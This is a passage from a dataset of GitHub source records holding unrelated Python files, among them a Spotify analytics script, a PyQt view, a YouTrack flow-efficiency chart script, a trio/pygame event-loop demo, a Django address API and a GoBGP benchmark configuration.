'XXXXXXX'\r\nclient_secret = 'XXXXXXX'\r\nusername = \"griffin_sleigh\"\r\nscope = \"user-read-currently-playing user-read-recently-played\"\r\nredirect_uri = \"http://localhost:8888/callback/\"\r\n\r\ntoken = util.prompt_for_user_token(username, scope, client_id = client_id, client_secret = client_secret, redirect_uri = redirect_uri)\r\nsp = spotipy.Spotify(auth=token)\r\n\r\ntry:\r\n currently_playing = sp.currently_playing()\r\n misc_info[\"currently_playing_uri\"] = currently_playing[\"item\"][\"uri\"]\r\n misc_info[\"currently_playing_image\"] = currently_playing[\"item\"][\"album\"][\"images\"][0][\"url\"]\r\n misc_info[\"currently_playing_artist\"] = currently_playing[\"item\"][\"artists\"][0][\"name\"]\r\n misc_info[\"currently_playing_song\"] = currently_playing[\"item\"][\"name\"]\r\n misc_info[\"currently_playing_song_link\"] = currently_playing[\"item\"][\"external_urls\"][\"spotify\"]\r\n misc_info[\"play_status\"] = \"Currently Playing\"\r\nexcept:\r\n currently_playing = sp.current_user_recently_played(limit=1)\r\n misc_info[\"currently_playing_uri\"] = currently_playing['items'][0]['track'][\"uri\"]\r\n misc_info[\"currently_playing_image\"] = currently_playing['items'][0]['track'][\"album\"][\"images\"][0][\"url\"]\r\n misc_info[\"currently_playing_artist\"] = currently_playing['items'][0]['track'][\"artists\"][0][\"name\"]\r\n misc_info[\"currently_playing_song\"] = currently_playing['items'][0]['track'][\"name\"]\r\n misc_info[\"currently_playing_song_link\"] = currently_playing['items'][0]['track'][\"external_urls\"][\"spotify\"]\r\n misc_info[\"play_status\"] = \"Last Played\"\r\n\r\n\r\n#Connecting to MySQL to export\r\nsqlEngine = sqlalchemy.create_engine('XXXXXXX')\r\ndbConnection = sqlEngine.connect()\r\nframe = streaming_grouped.to_sql(\"streaming\", dbConnection, if_exists='replace', index=False)\r\nframe_2 = playlist_songs.to_sql(\"playlist_songs\", dbConnection, if_exists='replace', index=False)\r\nframe_3 = misc_info.to_sql(\"misc_info\", dbConnection, if_exists='replace', index=False)\r\n\r\nprint((time.time() - start_time)/60)\r\n\r\n#Import from SQL\r\n\r\nimport mysql.connector as connection\r\ntry:\r\n mydb = connection.connect(host=\"XXXXXXX\", database = 'XXXXXXX',user=\"XXXXXXX\", passwd=\"XXXXXXX\",use_pure=True)\r\n query = \"Select * from streaming;\"\r\n streaming_grouped = pd.read_sql(query,mydb)\r\n query = \"Select * from playlist_songs;\"\r\n playlist_songs = pd.read_sql(query,mydb)\r\n mydb.close() #close the connection\r\nexcept Exception as e:\r\n mydb.close()\r\n print(str(e))\r\n \r\n#PREDICTION FOR WITHIN THE DASHBOARD\r\n\r\nfrom sklearn import preprocessing\r\nimport matplotlib.pyplot as plt\r\nimport statsmodels.api as sm\r\nfrom sklearn.tree import DecisionTreeClassifier\r\nfrom sklearn.linear_model import LogisticRegression\r\nfrom sklearn.neighbors import KNeighborsClassifier\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn import metrics\r\nfrom sklearn import tree\r\n\r\n#DATASETS\r\ny = pd.DataFrame(streaming_grouped['addedToEverything'])\r\ny = y.astype('int')\r\nx = streaming_grouped[['tempo', 'loudness', 'speechiness', 'acousticness', 'instrumentalness', 'liveness', 'valence', 'danceability', 'energy']]\r\nfeature_cols = ['tempo', 'loudness', 'speechiness', 'acousticness', 'instrumentalness', 'liveness', 'valence', 'danceability', 'energy']\r\nclass_names = ['Not', 'Added']\r\nx_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.3, random_state=1) # 70% training and 30% test\r\n\r\n#DECISION TREE\r\nclf = DecisionTreeClassifier(criterion='entropy', max_depth=10)\r\nclf = clf.fit(x_train, y_train)\r\ny_pred = clf.predict(x_test)\r\nprint(\"Accuracy:\", metrics.accuracy_score(y_test, y_pred))\r\ncnf_matrix_dt = metrics.confusion_matrix(y_test, y_pred)\r\n# Setting dpi = 300 to make image clearer than default\r\nfig, axes = plt.subplots(nrows = 1,ncols = 1,figsize = (4,4), dpi=600)\r\n\r\ntree.plot_tree(clf,\r\n feature_names = feature_cols,\r\n class_names= class_names,\r\n filled = True);\r\n\r\nfig.savefig('imagename.png')\r\n\r\n#LOGISTIC REGRESSION - CHANGE X BUT KEEP Y THE SAME\r\nfrom statsmodels.stats.outliers_influence import variance_inflation_factor\r\n# VIF dataframe\r\nvif_data = pd.DataFrame()\r\nvif_data[\"feature\"] = x.columns\r\n# calculating VIF for each feature\r\nvif_data[\"VIF\"] = [variance_inflation_factor(x.values, i)\r\n for i in range(len(x.columns))]\r\n\r\n\r\nlogreg = LogisticRegression(fit_intercept=True)\r\nlogreg.fit(x_train,y_train)\r\ny_pred=logreg.predict(x_test)\r\ncnf_matrix = metrics.confusion_matrix(y_test, y_pred)\r\nlogsm = sm.Logit(y_train, x_train).fit()\r\nprint(\"Accuracy:\",metrics.accuracy_score(y_test, y_pred))\r\n\r\n#K-NEAREST NEIGHBOURS\r\nknn = KNeighborsClassifier(n_neighbors=25)\r\nknn.fit(x_train, y_train)\r\ny_pred = knn.predict(x_test)\r\nprint(\"Accuracy:\", metrics.accuracy_score(y_test, y_pred))\r\n\r\n","repo_name":"gsleigh24/Portfolio","sub_path":"Spotify Data.py","file_name":"Spotify Data.py","file_ext":"py","file_size_in_byte":12683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"11687917496","text":"from foo import system\n\nif system.get_os() == \"Windows\":\n from win32event import CreateMutex\n from win32api import CloseHandle, GetLastError\n from winerror import ERROR_ALREADY_EXISTS\nelse:\n import os, commands\n\nclass SingleInstance(object):\n\n def __init__(self):\n self.last_error = False\n\n if system.get_os() == \"Windows\":\n self.mutex_name = 'foo_{D0E858DF-985E-4907-B7FB-8D732C3FC3B9}'\n self.mutex = CreateMutex(None, False, self.mutex_name)\n self.last_error = GetLastError()\n else:\n self.pid_path = '/tmp/foo.pid'\n if os.path.exists(self.pid_path):\n pid = open(self.pid_path, 'r').read().strip()\n pid_running = commands.getoutput('ls /proc | grep %s' % pid)\n\n if pid_running:\n self.last_error = True\n\n if not self.last_error:\n f = open(self.pid_path, 'w')\n f.write(str(os.getpid()))\n f.close()\n\n def is_running(self):\n if system.get_os() == \"Windows\":\n return (self.last_error == ERROR_ALREADY_EXISTS)\n else:\n return self.last_error\n\n def __del__(self):\n if system.get_os() == \"Windows\":\n if self.mutex:\n CloseHandle(self.mutex)\n else:\n if not self.last_error:\n os.unlink(self.pid_path)\n","repo_name":"wiliamsouza/playground","sub_path":"singleinstance.py","file_name":"singleinstance.py","file_ext":"py","file_size_in_byte":1409,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"41169908440","text":"from PyQt5.QtCore import *\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtWidgets import *\n\nfrom UI_instance.UI_Model.GiiaGraphicsScene import GiiaGraphicsScene\nfrom config.defaults import *\n\n\nclass GraphicsView(QGraphicsView):\n def __init__(self,parent=None):\n super(GraphicsView, self).__init__(parent=parent)\n self.scene=None\n self.guideLinePen=QPen()\n self.cursorPos=QPointF()\n self.skipMode=False\n def setScene(self, scene: GiiaGraphicsScene):\n self.scene=scene\n super(GraphicsView, self).setScene(scene)\n self.guideLinePen.setWidth(0)\n self.guideLinePen.setBrush(Qt.black)\n def setSkipMode(self,value:bool):\n self.skipMode=value\n self.scene.update()\n def setGuideLineColor(self,color:QColor):\n self.guideLinePen.setColor(color)\n def paintEvent(self, event: QPaintEvent):\n super(GraphicsView, self).paintEvent(event)\n ptr=QPainter(self.viewport())\n ptr.setPen(self.guideLinePen)\n cursorPos=self.scene.cursorPosition()\n #print(cursorPos)\n cursorPos=self.mapFromScene(cursorPos)\n if self.scene.isMarking():\n #print(\"marking\")\n lastCursorPos=self.scene.lastCursorPosition()\n lastCursorPos=self.mapFromScene(lastCursorPos)\n #print(lastCursorPos)\n #print(cursorPos)\n ptr.drawRect(QRectF(lastCursorPos,cursorPos).normalized())\n elif self.scene.isMoving():\n pass\n #print(\"moving\")\n else:\n ptr.drawLine(0, cursorPos.y(), self.width(), cursorPos.y());\n ptr.drawLine(cursorPos.x(), 0, cursorPos.x(), self.height());\n if self.skipMode:\n ptr.setRenderHints(self.renderHints())\n brush=QBrush(Qt.yellow)\n brush.setStyle(Qt.BDiagPattern)\n ptr.setBrush(brush)\n ptr.drawRect(0,0,self.width(),self.height())","repo_name":"generalized-intelligence/TeguAnnotation","sub_path":"src/UI_instance/UI_Model/GraphicsView.py","file_name":"GraphicsView.py","file_ext":"py","file_size_in_byte":1920,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"34633423728","text":"# INFORMATION\n# This script is intended to show the correlation of resolved bugs/tasks to the created ones per indicated periods.\n# The statistics is shown for P1, P2, P3 and all mentioned priorities together and demostrated in 4 histograms.\n# For correct script operation the following modules should be installed via 'pip install' if necessary: matplotlib, requests, time, datetime, numpy, sys.\n\n# Minimum number of arguments is 4:\n# 1 - Newest sprint number\n# 2- Oldest sprint number\n# 3 - Starting date of at least one period (sprint)\n# 4 - Ending date of at least one period (sprint)\n\n# Maximum number of date pairs is 8.\n\nimport matplotlib as mp\nimport requests\nimport time\nimport datetime\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport sys\n\n################\n### VIRABLES ###\ni_SprintsCount = 0\ni_PrioritiesCount = 3\ni_WorkingDay = 480 # one working day in minutes, 60 * 8 hours\n\n#####################\n### Authorization ###\nyt_url = '' # CADEX server api here\nyt_user = input('Login: ')\nyt_pass = input('Password: ')\nyt_auth = (yt_user, yt_pass)\n\n###################\n### Enter dates ###\ni_ArgCount = len(sys.argv)\ni_SprintNum = 1\nb_GetStartDate = True\nb_GetEndDate = False\n\nstr_Instructions = \"\"\"\n*** Instructions ***\n\nMinimum number of arguments is 4:\n1 - Newest sprint number\n2- Oldest sprint number\n3 - Starting date of at least one period (sprint)\n4 - Ending date of at least one period (sprint)\n\nMaximum number of date pairs is 8.\nThe following modules should be installed via 'pip install' if necessary: matplotlib, requests, time, datetime, numpy, sys.\n\n*** End ***\"\"\"\n\nif sys.argv[0] == 'instr':\n print(str_Instructions)\n sys.exit()\nelse:\n if i_ArgCount < 4 or (i_ArgCount % 2) == 0:\n print(str_Instructions)\n sys.exit()\n else: \n for i in range(i_ArgCount):\n if i < 3:\n if i == 0:\n continue\n elif i == 1:\n i_NewestSprint = int(sys.argv[i])\n elif i == 2:\n i_OldestSprint = int(sys.argv[i])\n elif i >= 3:\n if b_GetStartDate == True:\n globals()[f\"str_inputDateStart_S{i_SprintNum}\"] = sys.argv[i]\n b_GetStartDate = False\n b_GetEndDate = True\n elif b_GetEndDate == True:\n globals()[f\"str_inputDateEnd_S{i_SprintNum}\"] = sys.argv[i]\n b_GetStartDate = True\n b_GetEndDate = False\n i_SprintsCount += 1\n i_SprintNum += 1\n\n#############################\n### YouTrack bugs request ###\nstr_bugsQuery = ''\n\ndef Calc_FlowEff(dateStart, dateEnd, priority):\n #################### \n ### Get requests ###\n list_Issues = []\n dates = dateStart + ' .. ' + dateEnd + ' '\n issues_params = {'fields': 'idReadable,customFields(name,value(name))',\n 'query': 'resolved date: ' + dates + str_bugsQuery + 'State: -Rejected ' + 'Priority: P' + priority}\n\n request = requests.get(yt_url + 'issues', auth=yt_auth, params=issues_params)\n if (not request.ok):\n print(request.json(), file=sys.stderr)\n sys.exit(1)\n\n list_Issues.extend(request.json())\n\n ######################################### \n ### Calculate average flow efficiency ###\n list_FlowEffs = []\n activities_params = {'fields': 'added(name),removed(name),timestamp,field(name),author(fullName)',\n 'categories': 'CustomFieldCategory,IssueCreatedCategory,IssueResolvedCategory'}\n\n for issue in list_Issues:\n b_ResolvedDateActFound = False\n b_SpentTimeActFound = False\n\n ## Get activities\n requestActivities = requests.get(yt_url + 'issues/{}/activities'.format(issue['idReadable']), auth=yt_auth, params=activities_params)\n activities_chunk = requestActivities.json()\n\n ## Go through each list of activities\n for item in reversed(activities_chunk):\n i_WhenWasCreated = activities_chunk[0]['timestamp'] # date of creation\n\n if b_ResolvedDateActFound == False:\n # Find Resolved Date activity\n if item['field']['name'] == 'resolved date':\n i_WhenWasResolved = item['timestamp'] # when was resolved\n b_ResolvedDateActFound = True # found\n\n # Find Spent time\n if b_SpentTimeActFound == False:\n if item['field']['name'] == 'Spent Time':\n i_SpentTime = item['added'] # total time spent on task in MINUTES\n b_SpentTimeActFound = True # found\n\n # When Spent time and Resolved date found, CALCULATE FLOW EFFICIENCY\n if b_ResolvedDateActFound == True and b_SpentTimeActFound == True:\n # Date of creation\n dt_Create = datetime.datetime.fromtimestamp(i_WhenWasCreated / 1e3)\n d_createdDate = datetime.date(dt_Create.year, dt_Create.month, dt_Create.day)\n\n # Date of close\n dt_Resolved = datetime.datetime.fromtimestamp(i_WhenWasResolved / 1e3)\n d_resolvedDate = datetime.date(dt_Resolved.year, dt_Resolved.month, dt_Resolved.day)\n\n i_NumOfBusDays = np.busday_count(d_createdDate, d_resolvedDate) # consider only working days\n # If i_NumOfBusDays = 0, divide by (dt_Resolved - dt_Create)\n # If i_NumOfBusDays > 0, divide by Working days\n if i_NumOfBusDays > 0:\n f64_FlowEff = (i_SpentTime/(i_NumOfBusDays*i_WorkingDay))*100 # CALCULATE FLOW EFFICIENCY (FE)\n elif i_NumOfBusDays == 0:\n length = dt_Resolved - dt_Create # period from Created to Resolved\n f64_FlowEff = (i_SpentTime/(length.seconds/60))*100 # CALCULATE FLOW EFFICIENCY (FE)\n list_FlowEffs.append(f64_FlowEff) # add one Flow Eff\n break\n \n if len(list_FlowEffs) > 0:\n f64_AvFlowEff = round((sum(list_FlowEffs) / len(list_FlowEffs)), 1)\n else:\n f64_AvFlowEff = np.nan\n\n return f64_AvFlowEff\n\n## Get lists Flow Efficiencies per sprints\ni_Priority = 0\ni_Sprint = 0\nlist_FlowEffP0 = []; list_FlowEffP1 = []; list_FlowEffP2 = []\nwhile i_Sprint != i_SprintsCount:\n i_Sprint += 1\n while i_Priority != i_PrioritiesCount:\n globals()[f\"list_FlowEffP{i_Priority}\"].append(Calc_FlowEff(globals()[f\"str_inputDateStart_S{i_Sprint}\"], \n globals()[f\"str_inputDateEnd_S{i_Sprint}\"], str(i_Priority)))\n i_Priority += 1\n i_Priority = 0\n\n################\n### Graphics ###\n## Set sprints numbers\nlist_SpintsNums = []\nif i_NewestSprint > i_OldestSprint:\n list_SpintsNums = [i for i in range(i_NewestSprint, i_OldestSprint-1, -1)]\nelif i_NewestSprint < i_OldestSprint:\n list1 = [i for i in range(i_NewestSprint, 0, -1)]\n list2 = [i for i in range(8, i_OldestSprint-1, -1)]\n list_SpintsNums = list1 + list2\n\n## Lines loop\nfig = plt.figure(figsize=(2.375*i_SprintsCount, 8))\n\n## Misc\nplt.grid(axis='y') # set grid\nplt.locator_params(axis='y', integer=True) # only integers on Y axes\n\n## Set axis bin names\nX_P = [globals()[f\"str_inputDateStart_S{i+1}\"][0:4]+'_S'+str(list_SpintsNums[i]) for i in range(i_SprintsCount)]\n\n## Set limits\nplt.xlim(-0.5, float(i_SprintsCount)-0.5)\n\n## Format ticks\nplt.tick_params(direction='inout', length=8, width=1)\nplt.xticks(fontsize=14)\nplt.yticks(fontsize=14)\n\n## Format tick name weight for 1st sprint in year\nn = -1 # number of 1st sprint\n# Find tick\nfor name in reversed(X_P):\n n += 1\n if name[-1] == '1':\n # Format tick name\n plt.gca().get_xticklabels()[n].set_weight(\"bold\")\n break\n\n## Labels\nx = np.arange(len(X_P)) \nwidth = 0.25 # the width of the bars\nplt.gca().set_xticks(x, reversed(X_P)) # set tasks names\n\n## Bars\nrectsP0 = plt.bar((x-width)-(width/2), list(reversed(list_FlowEffP0)), width, align='edge', color = 'r', label='P0')\nrectsP1 = plt.bar(x-(width/2), list(reversed(list_FlowEffP1)), width, align='edge', color = '#FFD700', label='P1')\nrectsP2 = plt.bar((x+width)-(width/2), list(reversed(list_FlowEffP2)), width, align='edge', color = '#228B22', label='P2')\nplt.bar_label(rectsP0, padding=3.0, fontsize = 12)\nplt.bar_label(rectsP1, padding=3.0, fontsize = 12)\nplt.bar_label(rectsP2, padding=3.0, fontsize = 12)\n\n## Titles\nplt.xlabel('Sprints', fontsize=20, fontweight='bold', style='italic') \nplt.ylabel('Flow efficiency, %', fontsize=20, fontweight='bold', style='italic')\nfig.suptitle('Average flow efficiency', fontsize=26, fontweight='bold')\n\n## Legend\nplt.legend(loc='upper center', bbox_to_anchor=(0.0, 0.05, 1.0, -0.15), \n ncol=3, fontsize=14, edgecolor='black', handletextpad=0.25)\n\n## Saving the plot as an image\nfig.tight_layout()\nfig.subplots_adjust(wspace=0.1825, hspace=0.3)\nfig.savefig('Average flow efficiency.png', bbox_inches='tight', dpi=150)\n\nprint('--- *** Successfully *** ---')","repo_name":"evgeniyzaitsev92/portfolio","sub_path":"Python/Scripts/Success metrics/flow_efficiency_average_per_sprints.py","file_name":"flow_efficiency_average_per_sprints.py","file_ext":"py","file_size_in_byte":9029,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16613213261","text":"import traceback\n\nimport trio\nimport pygame\nfrom outcome import Error\n\nimport example_tasks\n\n\nclass PygameHost:\n def __init__(self, app):\n self.app = app\n\n def run_sync_soon_threadsafe(self, func):\n \"\"\"Use Pygame/SDL fastevent.post to schedule a function call\n\n The fastevent library runs a (busy?) loop trying to re-post the events if the\n queue is full, so it can result in deadlocks if called from the main thread.\n In other words, unthreaded unsafe? so we must implement run_sync_soon_not_threadsafe.\n \"\"\"\n # internal convention: put it in the event __dict__ under the name \"thunk\"\n event = pygame.event.Event(pygame.USEREVENT, thunk=func)\n pygame.fastevent.post(event)\n\n def run_sync_soon_not_threadsafe(self, func):\n \"\"\"Use Pygame/SDL event.post to schedule a function call\n\n The event queue is of finite size so for now we crash hard when that fills.\n It would be possible to make an unbounded queue for this edge case, or print\n warnings and continue while losing events, but it seems more prudent to\n just try to keep the event queue empty.\n\n Open question: can we use event.post with fastevent? the code seems that way.\n\n raises pygame.error\n \"\"\"\n # internal convention: put it in the event __dict__ under the name \"thunk\"\n event = pygame.event.Event(pygame.USEREVENT, thunk=func)\n pygame.event.post(event)\n\n def done_callback(self, outcome):\n \"\"\"non-blocking request to end the main loop\n \"\"\"\n print(f\"Outcome: {outcome}\")\n if isinstance(outcome, Error):\n exc = outcome.error\n traceback.print_exception(type(exc), exc, exc.__traceback__)\n self.app.quit()\n\n def mainloop(self):\n self.app.mainloop()\n\n\nclass PygameDisplay:\n def __init__(self, app):\n self.app = app\n self.screen = pygame.display.set_mode((640, 480))\n self.screen.fill((30, 30, 30))\n self.font = pygame.font.SysFont('Sans', 30)\n cancelsurf = self.font.render('Cancel', True, (0, 0, 0))\n self.button_rect = pygame.Rect((235, 350), (170, 80))\n self.screen.fill((128, 128, 128), self.button_rect)\n self.screen.blit(cancelsurf, (280, 370))\n self.pbar_rect = pygame.Rect((20, 20), (600, 200))\n self.screen.fill((0, 128, 0), self.pbar_rect)\n self.maximum = 1\n\n def set_title(self, title):\n pygame.display.set_caption(title)\n\n def set_max(self, maximum):\n self.maximum = maximum\n\n def set_value(self, downloaded):\n progress_ticks = 600 * downloaded // self.maximum\n progress_rect = pygame.Rect((20, 20), (progress_ticks, 200))\n self.screen.fill((0, 255, 0), progress_rect)\n percentsurf = self.font.render(str(100 * downloaded // self.maximum) + '%', True, (255,) * 3, (20,) * 3)\n self.screen.blit(percentsurf, (300, 250))\n\n def set_cancel(self, fn):\n self.app.register_mouse_cb(fn, self.button_rect)\n self.app.register_quit_cb(fn)\n\n\n# I know it's rare to put a simple pygame app into a class but I wanted to match the program structure of the others\nclass PygameApp:\n def __init__(self):\n pygame.display.init()\n pygame.fastevent.init()\n pygame.font.init()\n self.running = False\n self._mouse_cbs = []\n self._quit_cb = self.quit\n\n def mainloop(self):\n self.running = True\n while self.running:\n for event in pygame.fastevent.get():\n # print(event)\n if event.type == pygame.QUIT:\n self._quit_cb()\n elif event.type == pygame.MOUSEBUTTONUP:\n self._mouse_callback(event.pos, event.button)\n elif event.type == pygame.USEREVENT:\n event.thunk() # don't forget to add some ifs here if other USEREVENTS appear\n else:\n pass\n # print('unused event:', event)\n pygame.display.flip()\n pygame.quit()\n\n def _mouse_callback(self, pos, button):\n for cb in self._mouse_cbs:\n cb(pos, button)\n\n def register_mouse_cb(self, fn, rect, button=1):\n\n def mouse_wrapper(pos, _button):\n if rect.collidepoint(pos) and button == _button:\n fn()\n\n self._mouse_cbs.append(mouse_wrapper)\n\n def register_quit_cb(self, fn):\n self._quit_cb = fn\n\n def quit(self):\n self.running = False\n\n\ndef main(task):\n app = PygameApp()\n host = PygameHost(app)\n display = PygameDisplay(app)\n trio.lowlevel.start_guest_run(\n task,\n display,\n run_sync_soon_threadsafe=host.run_sync_soon_threadsafe,\n run_sync_soon_not_threadsafe=host.run_sync_soon_not_threadsafe,\n done_callback=host.done_callback,\n )\n host.mainloop()\n\n\nif __name__ == '__main__':\n main(example_tasks.count)\n","repo_name":"richardsheridan/trio-guest","sub_path":"trio_guest_pygame.py","file_name":"trio_guest_pygame.py","file_ext":"py","file_size_in_byte":4961,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"72"} +{"seq_id":"42802905212","text":"import gi\nimport logging\nfrom do_changes import *\ngi.require_version('GExiv2', '0.10')\nfrom gi.repository import GExiv2\n\n\nsearch_person_tags = [('Xmp.mwg-rs.Regions/mwg-rs:RegionList[', ']/mwg-rs:Name'),\n ('Xmp.MP.RegionInfo/MPRI:Regions[', ']/MPReg:PersonDisplayName')]\n\n\ndef _transfer_tags(current_file, metadata):\n if metadata.has_tag('Iptc.Application2.Keywords'):\n person_names = set(metadata.get_tag_multiple('Iptc.Application2.Keywords'))\n else:\n person_names = set()\n original_person_names = set(person_names)\n for person_num in range(1, 1000):\n for tag_begin, tag_end in search_person_tags:\n current_tag = tag_begin + str(person_num) + tag_end\n if metadata.has_tag(current_tag):\n current_person_name = metadata[current_tag]\n if current_person_name not in original_person_names:\n logging.info('%s = %s', str(person_num), current_person_name)\n person_names.add(current_person_name)\n if len(person_names) > len(original_person_names):\n if DO_CHANGES:\n metadata.set_tag_multiple('Iptc.Application2.Keywords', list(person_names))\n metadata.save_file()\n logging.info(\"%s ... face tags copied from XMP to IPTC\", current_file)\n\n\ndef transfert_picasa_to_piwigo_face_tags(current_file):\n metadata = GExiv2.Metadata(str(current_file))\n has_face_tags = False\n for tag_begin, tag_end in search_person_tags:\n if metadata.has_tag(tag_begin + '1' + tag_end):\n has_face_tags = True\n break\n if has_face_tags:\n _transfer_tags(current_file, metadata)\n","repo_name":"esppat/updatePiwigo","sub_path":"face_tags.py","file_name":"face_tags.py","file_ext":"py","file_size_in_byte":1671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"36537378737","text":"from .models import Address\nfrom .serializers import AddressSerializer\nfrom django.http import Http404,HttpResponse\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework import status\n\nclass AddressApiView(APIView):\n def get(self, request, pk, format=None):\n ad = Address.objects.filter(pk = pk).first()\n if ad:\n serializer = AddressSerializer(ad)\n return Response(serializer.data)\n return Response('No such address in address book exists kindly check id/pk')\n\n def post(self, request,pk, format=None):\n serializer = AddressSerializer(data=request.data,partial=True)\n if serializer.is_valid():\n serializer.save()\n return Response(\n data=serializer.data,\n status=status.HTTP_201_CREATED\n )\n return Response(\n data=serializer.errors,\n status=status.HTTP_400_BAD_REQUEST\n )\n\n def patch(self, request,pk, format=None):\n obj = Address.objects.filter(pk=pk).first()\n if obj: \n serializer = AddressSerializer(obj,data=request.data,partial=True)\n if serializer.is_valid():\n serializer.save()\n return Response(\n data=serializer.data\n )\n return Response(\n data=serializer.errors,\n status=status.HTTP_400_BAD_REQUEST\n )\n return Response('No such address in address book exists kindly check id/pk')\n\n def delete(self,request,pk, format=None):\n obj = Address.objects.filter(pk=pk).first()\n obj.delete()\n return Response(\n status=status.HTTP_204_NO_CONTENT\n )\n\nclass NearByAddressApiView(APIView):\n def get(self, request, format=None):\n aid = request.GET.get('aid',None)\n print(aid)\n ad = Address.objects.filter(id=aid).first()\n if ad:\n obj = Address.objects.filter(latitude__lte=ad.latitude+1,latitude__gte=ad.latitude-1,longitude__lte=ad.longitude+1,longitude__gte=ad.longitude-1)\n print(obj)\n if obj:\n serializer = AddressSerializer(obj,many=True)\n return Response(serializer.data)\n return Response('No such address in address book exists with nearby coordinates')\n\nclass AllAddressApiView(APIView):\n def get(self, request, format=None):\n obj = Address.objects.all().order_by('city')\n serializer = AddressSerializer(obj,many=True)\n return Response(\n data=serializer.data\n )","repo_name":"sakshampathak1508/EastVantage-Task","sub_path":"addressbook/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2626,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"10499324677","text":"import sys\nimport traceback\n\nx = 10\ny = int(input('請輸入數字:'))\ntry:\n z = x / y\n print(z)\n#except:\n print('錯誤!錯誤!')\n\nexcept Exception as e:\n print('錯誤!錯誤!', e)\n print(e.__class__.__name__)\n cl, exc, tb = sys.exc_info()\n lastCallStack = traceback.extract_tb(tb)[-1]\n print(lastCallStack) # 可抓出哪裡有錯,detail information\nelse:\n print(z)","repo_name":"tina8860035/yzu_python","sub_path":"Lesson08/exception/ExceptDemo1.py","file_name":"ExceptDemo1.py","file_ext":"py","file_size_in_byte":398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"23658627314","text":"from base import *\n\nclass GoBGP(Container):\n\n CONTAINER_NAME = None\n GUEST_DIR = '/root/config'\n\n def __init__(self, host_dir, conf, image='bgperf/gobgp'):\n super(GoBGP, self).__init__(self.CONTAINER_NAME, image, host_dir, self.GUEST_DIR, conf)\n\n @classmethod\n def build_image(cls, force=False, tag='bgperf/gobgp', checkout='HEAD', nocache=False):\n cls.dockerfile = '''\nFROM golang:1.6\nWORKDIR /root\nRUN go get -v github.com/osrg/gobgp/gobgpd\nRUN go get -v github.com/osrg/gobgp/gobgp\nRUN cd $GOPATH/src/github.com/osrg/gobgp && git checkout {0}\nRUN go install github.com/osrg/gobgp/gobgpd\nRUN go install github.com/osrg/gobgp/gobgp\n'''.format(checkout)\n super(GoBGP, cls).build_image(force, tag, nocache)\n\n\nclass GoBGPTarget(GoBGP, Target):\n\n CONTAINER_NAME = 'bgperf_gobgp_target'\n CONFIG_FILE_NAME = 'gobgpd.conf'\n\n def write_config(self, scenario_global_conf):\n\n config = {}\n config['global'] = {\n 'config': {\n 'as': self.conf['as'],\n 'router-id': self.conf['router-id']\n },\n }\n if 'policy' in scenario_global_conf:\n config['policy-definitions'] = []\n config['defined-sets'] = {\n 'prefix-sets': [],\n 'bgp-defined-sets': {\n 'as-path-sets': [],\n 'community-sets': [],\n 'ext-community-sets': [],\n },\n }\n for k, v in list(scenario_global_conf['policy'].items()):\n conditions = {\n 'bgp-conditions': {},\n }\n for i, match in enumerate(v['match']):\n n = '{0}_match_{1}'.format(k, i)\n if match['type'] == 'prefix':\n config['defined-sets']['prefix-sets'].append({\n 'prefix-set-name': n,\n 'prefix-list': [{'ip-prefix': p} for p in match['value']]\n })\n conditions['match-prefix-set'] = {'prefix-set': n}\n elif match['type'] == 'as-path':\n config['defined-sets']['bgp-defined-sets']['as-path-sets'].append({\n 'as-path-set-name': n,\n 'as-path-list': match['value'],\n })\n conditions['bgp-conditions']['match-as-path-set'] = {'as-path-set': n}\n elif match['type'] == 'community':\n config['defined-sets']['bgp-defined-sets']['community-sets'].append({\n 'community-set-name': n,\n 'community-list': match['value'],\n })\n conditions['bgp-conditions']['match-community-set'] = {'community-set': n}\n elif match['type'] == 'ext-community':\n config['defined-sets']['bgp-defined-sets']['ext-community-sets'].append({\n 'ext-community-set-name': n,\n 'ext-community-list': match['value'],\n })\n conditions['bgp-conditions']['match-ext-community-set'] = {'ext-community-set': n}\n\n config['policy-definitions'].append({\n 'name': k,\n 'statements': [{'name': k, 'conditions': conditions, 'actions': {'route-disposition': {'accept-route': True}}}],\n })\n\n\n def gen_neighbor_config(n):\n c = {'config': {'neighbor-address': n['local-address'], 'peer-as': n['as']},\n 'transport': {'config': {'local-address': self.conf['local-address']}},\n 'route-server': {'config': {'route-server-client': True}}}\n if 'filter' in n:\n a = {}\n if 'in' in n['filter']:\n a['in-policy-list'] = n['filter']['in']\n a['default-in-policy'] = 'accept-route'\n if 'out' in n['filter']:\n a['export-policy-list'] = n['filter']['out']\n a['default-export-policy'] = 'accept-route'\n c['apply-policy'] = {'config': a}\n return c\n\n config['neighbors'] = [gen_neighbor_config(n) for n in list(flatten(list(t.get('neighbors', {}).values()) for t in scenario_global_conf['testers'])) + [scenario_global_conf['monitor']]]\n with open('{0}/{1}'.format(self.host_dir, self.CONFIG_FILE_NAME), 'w') as f:\n f.write(yaml.dump(config, default_flow_style=False))\n\n def get_startup_cmd(self):\n return '\\n'.join(\n ['#!/bin/bash',\n 'ulimit -n 65536',\n 'gobgpd -t yaml -f {guest_dir}/{config_file_name} -l {debug_level} > {guest_dir}/gobgpd.log 2>&1']\n ).format(\n guest_dir=self.guest_dir,\n config_file_name=self.CONFIG_FILE_NAME,\n 